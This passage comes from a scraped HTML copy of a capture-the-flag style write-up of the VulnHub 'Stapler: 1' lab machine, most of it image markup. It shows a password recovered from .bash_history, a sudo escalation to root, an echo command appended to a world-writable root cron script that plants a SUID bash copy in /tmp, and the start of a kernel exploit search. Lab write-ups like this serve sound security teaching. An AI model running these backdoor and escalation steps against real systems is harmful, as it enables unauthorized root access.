data-original=\"https:\/\/miro.medium.com\/max\/45\/1*OsFSsprJ9AAjJgcWXe6T_g.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"647\" height=\"306\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe120\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe120\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/971\/1*OsFSsprJ9AAjJgcWXe6T_g.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 647px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*OsFSsprJ9AAjJgcWXe6T_g.png 276w, https:\/\/miro.medium.com\/max\/828\/1*OsFSsprJ9AAjJgcWXe6T_g.png 552w, https:\/\/miro.medium.com\/max\/960\/1*OsFSsprJ9AAjJgcWXe6T_g.png 640w, https:\/\/miro.medium.com\/max\/971\/1*OsFSsprJ9AAjJgcWXe6T_g.png 647w\" width=\"647\" height=\"306\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe121\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe121\" \/><\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"da27\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Running service, \u2018cron -f\u2019 indicating there\u2019s running cronjob.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev alc\">\n<div class=\"kc s ao kd\">\n<div class=\"ald kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*lLY-5puYs6voezTAOQCahw.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"997\" height=\"130\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe122\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe122\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1496\/1*lLY-5puYs6voezTAOQCahw.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*lLY-5puYs6voezTAOQCahw.png 276w, https:\/\/miro.medium.com\/max\/828\/1*lLY-5puYs6voezTAOQCahw.png 552w, https:\/\/miro.medium.com\/max\/960\/1*lLY-5puYs6voezTAOQCahw.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*lLY-5puYs6voezTAOQCahw.png 700w\" width=\"997\" height=\"130\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe123\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe123\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"582f\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">There\u2019s a password in \u2018.bash_history\u2019<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"eu ev ale\">\n<div class=\"kc s ao kd\">\n<div class=\"alf kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*LAGoPzi5HnCMF-0zyBVxdA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"553\" height=\"86\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe124\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe124\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/830\/1*LAGoPzi5HnCMF-0zyBVxdA.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 553px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*LAGoPzi5HnCMF-0zyBVxdA.png 276w, https:\/\/miro.medium.com\/max\/828\/1*LAGoPzi5HnCMF-0zyBVxdA.png 552w, https:\/\/miro.medium.com\/max\/830\/1*LAGoPzi5HnCMF-0zyBVxdA.png 553w\" width=\"553\" height=\"86\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe125\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe125\" \/><\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"a3fb\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">3. Exploit<\/p>\n<ul class=\"\">\n<li id=\"d0f7\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja ld jc jd gj\" data-selectable-paragraph=\"\"><em class=\"wq\">Login as peter and verify sudo<\/em><\/li>\n<\/ul>\n<p id=\"20b3\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">From LinEnum.sh result<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"eu ev aky\">\n<div class=\"kc s ao kd\">\n<div class=\"akz kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*DmkyOtaaJDVAmaZ1YwnL0w.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"492\" height=\"98\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe118\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe118\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/738\/1*DmkyOtaaJDVAmaZ1YwnL0w.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 492px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*DmkyOtaaJDVAmaZ1YwnL0w.png 276w, https:\/\/miro.medium.com\/max\/738\/1*DmkyOtaaJDVAmaZ1YwnL0w.png 492w\" width=\"492\" height=\"98\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe119\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe119\" \/><\/div>\n<\/div>\n<\/div>\n<\/figure>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"eu ev ale\">\n<div class=\"kc s ao kd\">\n<div class=\"alf kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*LAGoPzi5HnCMF-0zyBVxdA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"553\" height=\"86\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe124\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe124\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/830\/1*LAGoPzi5HnCMF-0zyBVxdA.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 553px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*LAGoPzi5HnCMF-0zyBVxdA.png 276w, https:\/\/miro.medium.com\/max\/828\/1*LAGoPzi5HnCMF-0zyBVxdA.png 552w, https:\/\/miro.medium.com\/max\/830\/1*LAGoPzi5HnCMF-0zyBVxdA.png 553w\" width=\"553\" height=\"86\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe125\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe125\" \/><\/div>\n<\/div>\n<\/div>\n<\/figure>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"cebb\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">su peter<\/span><span id=\"0b29\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">Password: JZQuyIN5<\/span><\/pre>\n<p id=\"7edd\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Verify sudo<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"1ee4\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">sudo -l<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev alg\">\n<div class=\"kc s ao kd\">\n<div class=\"alh kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*ttNxAbfeUbSpgIY1Eg1EMA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"930\" height=\"410\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe126\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe126\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1395\/1*ttNxAbfeUbSpgIY1Eg1EMA.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*ttNxAbfeUbSpgIY1Eg1EMA.png 276w, https:\/\/miro.medium.com\/max\/828\/1*ttNxAbfeUbSpgIY1Eg1EMA.png 552w, https:\/\/miro.medium.com\/max\/960\/1*ttNxAbfeUbSpgIY1Eg1EMA.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*ttNxAbfeUbSpgIY1Eg1EMA.png 700w\" width=\"930\" height=\"410\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe127\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe127\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"1917\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Change to root<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"311c\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">sudo su<\/span><span id=\"0075\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">whoami<\/span><\/pre>\n<p id=\"29df\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Now, I\u2019m root.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"eu ev ali\">\n<div class=\"kc s ao kd\">\n<div class=\"alj kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*mj5C83bQLqTX8s6wbDZ9iA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"352\" height=\"159\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe128\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe128\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"352\" height=\"159\" \/><\/div>\n<\/div>\n<\/div>\n<\/figure>\n<ul class=\"\">\n<li id=\"6a3d\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja ld jc jd gj\" data-selectable-paragraph=\"\"><em class=\"wq\">cronjob<\/em><\/li>\n<\/ul>\n<p id=\"468f\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">From LinEnum.sh result<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"eu ev ala\">\n<div class=\"kc s ao kd\">\n<div class=\"alb kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*OsFSsprJ9AAjJgcWXe6T_g.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"647\" height=\"306\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe129\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe129\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"647\" height=\"306\" \/><\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"630a\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">I will verify the path of these services<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"40df\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">cat \/etc\/cron.d\/logrotate<\/span><\/pre>\n<p id=\"719c\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">There\u2019s \u2018.sh\u2019 script.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"eu ev alk\">\n<div class=\"kc s ao kd\">\n<div class=\"all kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*qI-FfMEuxdyr_mVDlVzgqw.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"637\" height=\"88\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe130\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe130\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"637\" height=\"88\" \/><\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"5fa1\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Verify permission<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"bd2e\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">ls -la \/usr\/local\/sbin\/cron-logrotate.sh<\/span><\/pre>\n<p id=\"1f0b\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">It\u2019s owned by root and can be edited by anyone.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev alm\">\n<div class=\"kc s ao kd\">\n<div class=\"aln kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*_-UmKTD-qbM75Ey2KMEs7Q.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"819\" height=\"79\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe131\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe131\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"819\" height=\"79\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"f686\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Read its content<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"f654\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">cat \/usr\/local\/sbin\/cron-logrotate.sh<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev alo\">\n<div class=\"kc s ao kd\">\n<div class=\"alp kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*T8QNJBLUIBE6GoQdHTqp0Q.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"768\" height=\"86\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe132\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe132\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1152\/1*T8QNJBLUIBE6GoQdHTqp0Q.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*T8QNJBLUIBE6GoQdHTqp0Q.png 276w, https:\/\/miro.medium.com\/max\/828\/1*T8QNJBLUIBE6GoQdHTqp0Q.png 552w, https:\/\/miro.medium.com\/max\/960\/1*T8QNJBLUIBE6GoQdHTqp0Q.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*T8QNJBLUIBE6GoQdHTqp0Q.png 700w\" width=\"768\" height=\"86\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe133\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe133\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"d2ea\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Append the command to get a root shell and verify<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"d505\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">echo \"cp \/bin\/bash \/tmp\/rootbash; chmod +xs \/tmp\/rootbash\" &gt;&gt; \/usr\/local\/sbin\/cron-logrotate.sh<\/span><span id=\"6fbe\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">cat \/usr\/local\/sbin\/cron-logrotate.sh<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev alq\">\n<div class=\"kc s ao kd\">\n<div class=\"alr kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*5XpRms4Mj3LHWRy6FLNeuA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1084\" height=\"170\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe134\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe134\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1626\/1*5XpRms4Mj3LHWRy6FLNeuA.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*5XpRms4Mj3LHWRy6FLNeuA.png 276w, https:\/\/miro.medium.com\/max\/828\/1*5XpRms4Mj3LHWRy6FLNeuA.png 552w, https:\/\/miro.medium.com\/max\/960\/1*5XpRms4Mj3LHWRy6FLNeuA.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*5XpRms4Mj3LHWRy6FLNeuA.png 700w\" width=\"1084\" height=\"170\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe135\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe135\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"26f5\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Wait for a while and verify \/tmp<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"7b48\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">ls -la<\/span><\/pre>\n<p id=\"eb81\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Now, I got rootbash<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev als\">\n<div class=\"kc s ao kd\">\n<div class=\"alt kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*NlxNqBJmNka04YD_8KWMRA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"736\" height=\"349\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe136\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe136\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1104\/1*NlxNqBJmNka04YD_8KWMRA.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*NlxNqBJmNka04YD_8KWMRA.png 276w, https:\/\/miro.medium.com\/max\/828\/1*NlxNqBJmNka04YD_8KWMRA.png 552w, https:\/\/miro.medium.com\/max\/960\/1*NlxNqBJmNka04YD_8KWMRA.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*NlxNqBJmNka04YD_8KWMRA.png 700w\" width=\"736\" height=\"349\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe137\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe137\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"b40e\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Run it<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"f5f0\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">\/tmp\/rootbash -p<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"eu ev alu\">\n<div class=\"kc s ao kd\">\n<div class=\"alv kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*cD7zrNwRMNMvZ5iwsmczlQ.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"363\" height=\"160\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe138\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe138\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/545\/1*cD7zrNwRMNMvZ5iwsmczlQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 363px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*cD7zrNwRMNMvZ5iwsmczlQ.png 276w, https:\/\/miro.medium.com\/max\/545\/1*cD7zrNwRMNMvZ5iwsmczlQ.png 363w\" width=\"363\" height=\"160\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe139\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe139\" \/><\/div>\n<\/div>\n<\/div>\n<\/figure>\n<ul class=\"\">\n<li id=\"455e\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja ld jc jd gj\" data-selectable-paragraph=\"\"><em class=\"wq\">kernel exploitation<\/em><\/li>\n<\/ul>\n<p id=\"11d1\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Verify kernel version<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"2592\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">uname -a<\/span><\/pre>\n<p id=\"3a18\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">This machine is Linux kernel 4.4.0 32 bit.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev alw\">\n<div class=\"kc s ao kd\">\n<div class=\"alx kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*IpavaoPq_ihNv0ef3dF_HQ.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1157\" height=\"76\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe140\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe140\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1736\/1*IpavaoPq_ihNv0ef3dF_HQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*IpavaoPq_ihNv0ef3dF_HQ.png 276w, https:\/\/miro.medium.com\/max\/828\/1*IpavaoPq_ihNv0ef3dF_HQ.png 552w, https:\/\/miro.medium.com\/max\/960\/1*IpavaoPq_ihNv0ef3dF_HQ.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*IpavaoPq_ihNv0ef3dF_HQ.png 700w\" width=\"1157\" height=\"76\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe141\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe141\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"7231\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Search w\/ searchsploit<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"33af\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">searchsploit linux kernel 4.4<\/span><\/pre>\n<p id=\"c929\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">After many tries, I succeeded w\/ this exploit.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev aly\">\n<div class=\"kc s ao kd\">\n<div class=\"alz kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*hYPJuVDnOqyDtjEXfftJUw.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1870\" height=\"516\" 